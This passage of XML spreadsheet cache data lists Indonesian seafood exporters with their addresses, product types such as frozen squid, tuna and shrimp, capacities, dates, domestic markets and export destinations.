    <d v="2020-04-21T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20807"/>
    <x v="66"/>
    <s v="PT. MUARA ANUGERAH JAYA"/>
    <s v="Jl. Muara Baru Ujung Blok S No.14, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-06T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19395"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, Canada, China, Japan, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19396"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Australia, Canada, China, Japan, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19999"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="17006"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Denpasar"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="21357"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20434"/>
    <x v="101"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Nila Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1203848"/>
    <s v="Kota Jakarta Barat, Kota Bogor, Kota Bandung, Kota Surabaya"/>
    <s v="Australia, Canada, Netherlands, Thailand, United States"/>
  </r>
  <r>
    <n v="17009"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kuring, Salem)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Aceh Singkil, Kota Sibolga, Kota Medan"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="21327"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Cumi Karet, Gurita, Cumi-cumi)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kabupaten Tangerang"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="17008"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Malong, Layur, Gulama)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Aceh Singkil, Kota Sibolga"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="20546"/>
    <x v="51"/>
    <s v="PT, AGROMINA WICAKSANA"/>
    <s v="Jl, Berbek Industri V No,25 B, Kel, Berbek, Kec, Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20957"/>
    <x v="102"/>
    <s v="CV. ANUGRAH BAHARI"/>
    <s v="Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Katamba, Sebelah, Kerapu, Kakatua, Kakap)"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Malaysia, Saudi Arabia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="20959"/>
    <x v="102"/>
    <s v="CV. ANUGRAH BAHARI"/>
    <s v="Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Malaysia, Saudi Arabia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="20960"/>
    <x v="102"/>
    <s v="CV. ANUGRAH BAHARI"/>
    <s v="Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Pusat, Kota Denpasar"/>
    <s v="Malaysia, Saudi Arabia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="21235"/>
    <x v="103"/>
    <s v="PT. INDONESIA BAHARI LESTARI"/>
    <s v="Jl. Raya Narogong KM 26.5, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Surimi Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="2140000"/>
    <s v="Kota Tangerang"/>
    <s v="Japan, Korea, Democratic People's Republic of, Thailand"/>
  </r>
  <r>
    <n v="20385"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Cobia, Kembung, Lemadang, Marlin, Gindara, Layaran, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Germany, Netherlands, Russian Federation, United States"/>
  </r>
  <r>
    <n v="20727"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20852"/>
    <x v="106"/>
    <s v="CV. SELAT MALAKA FROZEN"/>
    <s v="Jl. Lingkar Lingkungan XI Komplek Pelabuhan Perikanan Samudera Belawan Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="312000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="20956"/>
    <x v="102"/>
    <s v="CV. ANUGRAH BAHARI"/>
    <s v="Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="20958"/>
    <x v="102"/>
    <s v="CV. ANUGRAH BAHARI"/>
    <s v="Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, United Arab Emirates"/>
  </r>
  <r>
    <n v="21245"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-07-29T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Japan, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21333"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21360"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21361"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21363"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21364"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="21246"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Bawal)"/>
    <d v="2020-07-29T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara"/>
    <s v="Malaysia, Saudi Arabia, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="21379"/>
    <x v="107"/>
    <s v="CV. CHARLIE ERA PRANATA"/>
    <s v="Jl. Alor Komplek PPI Oeba, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Russian Federation, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20668"/>
    <x v="108"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Worang By Pass, Desa Kaima, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="684000"/>
    <m/>
    <s v="Canada, Netherlands, Philippines, Spain, United States"/>
  </r>
  <r>
    <n v="21325"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Kod)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="1172000"/>
    <m/>
    <s v="Australia, Canada, Germany, Philippines, United States"/>
  </r>
  <r>
    <n v="20550"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Utara, Kabupaten Demak, Kabupaten Banyuwangi, Kota Malang, Kota Probolinggo"/>
    <s v="Australia, China, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20720"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro, Tetet)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Timur, Kota Bekasi, Kota Tangerang"/>
    <s v="Japan, Philippines, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20899"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Bandung"/>
    <s v="China, Japan, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19657"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="China, Japan, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19659"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="China, Japan, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20997"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21004"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Segar (Lele, Gurami, Empurau, Betutu, Bandeng, Patin, Nila)"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21007"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21025"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kulit Ikan Kering"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20522"/>
    <x v="110"/>
    <s v="PT. CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Senangin, Biji Nangka, Kerapu, Layur, Halibut, Kakatua, Kakap, Kaci-kaci, Kuro)"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20521"/>
    <x v="110"/>
    <s v="PT. CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Bonito, Escolar, Kembung, Lemadang, Layaran, Cakalang, Tenggiri)"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20567"/>
    <x v="86"/>
    <s v="PT. INDOSUKSES MANDIRI ABADI"/>
    <s v="Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19431"/>
    <x v="73"/>
    <s v="PT. MANDIRI SUKSES JAYA PERKASA"/>
    <s v="Jl. Pusat Pemasaran Ikan No.74,75,76 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Kuwe, Kembung, Lemadang, Salem, Talang-talang, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="1200"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21284"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19818"/>
    <x v="111"/>
    <s v="PT. BATULICIN ALGAE PERSADA"/>
    <s v="Jl. Raya Serongga, Kel. Gunung Besar, Kec. Simpang empat, Kabupaten Tanah Bumbu&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Alkali Treated Seaweed Chips"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="540000"/>
    <s v="Kota Bekasi, Kota Surabaya, Kota Makassar"/>
    <s v="Korea, Democratic People's Republic of, Philippines"/>
  </r>
  <r>
    <n v="19307"/>
    <x v="112"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA"/>
    <s v="Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Udang Beku"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Republic of, Singapore, United States"/>
  </r>
  <r>
    <n v="19335"/>
    <x v="113"/>
    <s v="CV. BUANA TIRTA SEJAHTERA"/>
    <s v="Jl. Ir. Sutami No. 34B Pergudangan SPPBE Blok F3, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="6000000"/>
    <m/>
    <s v="Chile, China, Japan, Philippines, Tunisia, Viet Nam"/>
  </r>
  <r>
    <n v="19557"/>
    <x v="114"/>
    <s v="CV. ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No.38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakatua, Kakap)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="United States, United States Minor Outlying Islands"/>
  </r>
  <r>
    <n v="19850"/>
    <x v="115"/>
    <s v="PT. WINAROS KAWULA BAHARI"/>
    <s v="Jl. Raya Cangkringmalang Km 39,4, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="2400000"/>
    <m/>
    <s v="Belgium, Germany, Japan, Netherlands, United States"/>
  </r>
  <r>
    <n v="20764"/>
    <x v="116"/>
    <s v="CV. DUA SAMPURNA"/>
    <s v="Jl. Raya Kepadangan No.104 RT 003 RW 001, Kel. Kepadangan, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="4000000"/>
    <m/>
    <s v="China, Denmark, India, Philippines, Spain, Viet Nam"/>
  </r>
  <r>
    <n v="19629"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demesal Beku (Sebelah, Kerapu, Layur, Bawal, Kakap, Lidah, Kurisi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19628"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19630"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Sebelah, Kerapu, Layur, Bawal, Kakap, Lidah, Kurisi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Batam, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19627"/>
    <x v="75"/>
    <s v="UD, NAGATA TUNA"/>
    <s v="Jl, Cot Aron 2 No,2, Kel, Punge Blang Cut, Kec, Jaya Baru, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Kembung, Lemadang, Marlin, Layaran, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat"/>
    <s v="Japan, Malaysia, Saudi Arabia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20836"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Medan"/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20837"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kerapu Bintik, Kerapu, Kakap Merah, Merah, Kakap)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Medan"/>
